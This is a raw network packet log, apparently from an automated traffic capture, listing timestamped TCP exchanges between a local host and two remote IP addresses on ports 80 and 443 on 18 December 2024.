                                                                                                                                                                  Dec 18, 2024 11:09:27.406436920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.407191038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.407308102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.407341957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.407341957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.408179998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.408301115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.408334970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.408334970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.409208059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.409307003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.409344912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.409346104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.410159111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.410262108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.410301924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.410301924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.411220074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.411259890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.411298990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.411298990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.412132978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.412177086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.412241936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.412348986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.413100958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.413228989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.413269043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.413269043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.414109945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.414232969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.414238930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.414617062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.415083885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.415179014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.415215969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.415215969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.416071892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.416218996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.416258097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.416258097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.417042971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.417170048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.417205095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.417205095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.418008089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.418210983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.418248892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.418248892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.418987036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.419038057 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.419085979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.419332981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.420041084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.420140028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.420183897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.420183897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.420998096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.421083927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.421123028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.421123028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.421982050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.422094107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.422116995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.422960043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.423002005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.423002005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.423079967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.423346996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.423918962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.424006939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.424042940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.424042940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.425010920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.425117016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.425153971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.425153971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.425913095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.426004887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.426039934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.426039934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.426899910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.427030087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.427067041 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.427067995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.427930117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.427984953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.428023100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.428023100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.428841114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.428939104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.428976059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.428976059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.429904938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.430159092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.569948912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.569973946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.570118904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.570118904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.570159912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.570358038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.570389986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.570446968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.570472002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.570996046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.571404934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.571424961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.571460962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.571460962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.572343111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.572452068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.572489023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.572489023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.573338032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.573390007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.573421001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.573633909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.574371099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.574443102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.574484110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.574484110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.575262070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.575331926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.575370073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.576010942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.576255083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.576360941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.576399088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.576399088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.577322006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.577389956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.577430010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.577430010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.578214884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.578311920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.578327894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.578615904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.579199076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.579273939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.579284906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.579335928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.580183983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.580296040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.580312014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.580355883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.581166983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.581247091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.581331968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.581372976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.582151890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.582204103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.582242966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.582242966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.583219051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.583352089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.583367109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.583745003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.584228039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.584255934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.584300995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.584300995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.585119963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.585182905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.585197926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.585798979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.586071968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.586178064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.586206913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.586606979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.587055922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.587165117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.587183952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.587295055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.588063002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.588102102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.588136911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.588136911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.589097977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.589108944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.589157104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.589158058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.590051889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.590101957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.590162992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.590495110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.591032982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.591088057 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.591109991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.591249943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.591387987 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.591453075 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:27.592000961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.592020988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.592042923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.592077017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.592943907 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:27.592950106 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.592988968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.593030930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.593105078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.593139887 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.593539953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.593945026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.593983889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.594031096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.594494104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.594494104 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:27.594614983 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:27.594633102 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.594913006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.594957113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.594993114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.595335960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.595948935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.595963001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.596004963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.596004963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.596941948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.597244024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.597317934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.597317934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.597875118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.597938061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.597959995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.597999096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.599019051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.599108934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.599153996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.599153996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.600064039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.600115061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.600152016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.600913048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.600972891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.600972891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.601044893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.601176023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.601959944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.602005005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.602083921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.602366924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.603144884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.603157997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.603205919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.603205919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.603749037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.603885889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.603926897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.603926897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.604718924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.604769945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.604806900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.604806900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.605707884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.605803967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.605851889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.605851889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.606678963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.606797934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.606832981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.606832981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.607722998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.607800007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.607834101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.607834101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.608668089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.608737946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.609081030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.609246969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.609651089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.609764099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.609777927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.609895945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.610662937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.610743046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.610778093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.610778093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.611680984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.611716032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.611725092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.611767054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.612622023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.612680912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.612767935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.612801075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.613723040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.613737106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.613778114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.613778114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.614557981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.614607096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.614675045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.614713907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.615535021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.615578890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.615644932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.615725040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.616569042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.616607904 CET4991280192.168.2.631.41.244.11
